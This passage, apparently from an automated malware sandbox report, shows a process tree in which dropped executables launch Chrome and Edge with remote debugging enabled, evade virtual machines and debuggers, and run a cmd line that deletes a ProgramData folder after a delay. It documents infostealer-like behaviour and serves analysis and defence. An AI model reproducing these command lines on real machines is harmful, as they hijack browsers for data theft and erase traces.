                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4224,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4628 /prefetch:1
                                              6⤵
                                              • Uses browser remote debugging
                                              PID:5960
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4220,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4212 /prefetch:8
                                              6⤵
                                                PID:2880
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4644,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5156 /prefetch:8
                                                6⤵
                                                  PID:5972
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5372,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5356 /prefetch:8
                                                  6⤵
                                                    PID:832
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5464,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5472 /prefetch:8
                                                    6⤵
                                                      PID:5488
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4876,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4880 /prefetch:8
                                                      6⤵
                                                        PID:5240
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                      5⤵
                                                      • Uses browser remote debugging
                                                      • Enumerates system info in registry
                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                      PID:3264
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff926f13cb8,0x7ff926f13cc8,0x7ff926f13cd8
                                                        6⤵
                                                          PID:1720
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2000 /prefetch:2
                                                          6⤵
                                                            PID:1012
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:3
                                                            6⤵
                                                              PID:220
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
                                                              6⤵
                                                                PID:5488
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
                                                                6⤵
                                                                • Uses browser remote debugging
                                                                PID:5948
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
                                                                6⤵
                                                                • Uses browser remote debugging
                                                                PID:5712
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1988 /prefetch:2
                                                                6⤵
                                                                  PID:5464
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2712 /prefetch:2
                                                                  6⤵
                                                                    PID:6024
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2016 /prefetch:2
                                                                    6⤵
                                                                      PID:4840
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2332 /prefetch:2
                                                                      6⤵
                                                                        PID:2040
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4612 /prefetch:2
                                                                        6⤵
                                                                          PID:4772
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
                                                                          6⤵
                                                                          • Uses browser remote debugging
                                                                          PID:5324
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2300 /prefetch:1
                                                                          6⤵
                                                                          • Uses browser remote debugging
                                                                          PID:5000
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3376 /prefetch:8
                                                                          6⤵
                                                                            PID:3016
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\qqi5x" & exit
                                                                          5⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:5712
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout /t 10
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Delays execution with timeout.exe
                                                                            PID:1392
                                                                      • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Checks processor information in registry
                                                                        PID:5508
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 992
                                                                        4⤵
                                                                        • Program crash
                                                                        PID:2856
                                                                    • C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:5588
                                                                    • C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"
                                                                      3⤵
                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                      • Checks BIOS information in registry
                                                                      • Executes dropped EXE
                                                                      • Identifies Wine through registry keys
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:1952
                                                                    • C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1484
                                                                    • C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1716
                                                                      • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Checks processor information in registry
                                                                        PID:5268
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                          5⤵
                                                                          • Uses browser remote debugging
                                                                          • Drops file in Windows directory
                                                                          • Enumerates system info in registry
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5488
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff926f0cc40,0x7ff926f0cc4c,0x7ff926f0cc58
                                                                            6⤵
                                                                              PID:3776
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1892 /prefetch:2
                                                                              6⤵
                                                                                PID:1552
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1736,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2080 /prefetch:3
                                                                                6⤵
                                                                                  PID:1368
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2144,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2160 /prefetch:8
                                                                                  6⤵
                                                                                    PID:1096
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3180 /prefetch:1
                                                                                    6⤵
                                                                                    • Uses browser remote debugging
                                                                                    PID:4980
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3224 /prefetch:1
                                                                                    6⤵
                                                                                    • Uses browser remote debugging
                                                                                    PID:3884
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4412,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4532 /prefetch:8
                                                                                    6⤵
                                                                                      PID:1404
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4632,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4404 /prefetch:1
                                                                                      6⤵
                                                                                      • Uses browser remote debugging
                                                                                      PID:4584
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4800 /prefetch:8
                                                                                      6⤵
                                                                                        PID:4780
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4940,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4824 /prefetch:8
                                                                                        6⤵
                                                                                          PID:4596
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4932,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5108 /prefetch:8
                                                                                          6⤵
                                                                                            PID:1408
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4784,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5248 /prefetch:1
                                                                                            6⤵
                                                                                            • Uses browser remote debugging
                                                                                            PID:484
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5264,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4200 /prefetch:8
                                                                                            6⤵
                                                                                              PID:5812
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5024 /prefetch:8
                                                                                              6⤵
                                                                                                PID:2332
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5128,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4836 /prefetch:8
                                                                                                6⤵
                                                                                                  PID:3456
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                5⤵
                                                                                                • Uses browser remote debugging
                                                                                                • Enumerates system info in registry
                                                                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                PID:2268
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff926f13cb8,0x7ff926f13cc8,0x7ff926f13cd8
                                                                                                  6⤵
                                                                                                    PID:3016
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1968 /prefetch:2
                                                                                                    6⤵
                                                                                                      PID:1316
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 /prefetch:3
                                                                                                      6⤵
                                                                                                        PID:2672
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
                                                                                                        6⤵
                                                                                                          PID:4348
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
                                                                                                          6⤵
                                                                                                          • Uses browser remote debugging
                                                                                                          PID:852
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
                                                                                                          6⤵
                                                                                                          • Uses browser remote debugging
                                                                                                          PID:6056
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1956 /prefetch:2
                                                                                                          6⤵
                                                                                                            PID:2948
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2756 /prefetch:2
                                                                                                            6⤵
                                                                                                              PID:3384
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2184 /prefetch:2
                                                                                                              6⤵
                                                                                                                PID:5680
                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 5680 -s 288
                                                                                                                  7⤵
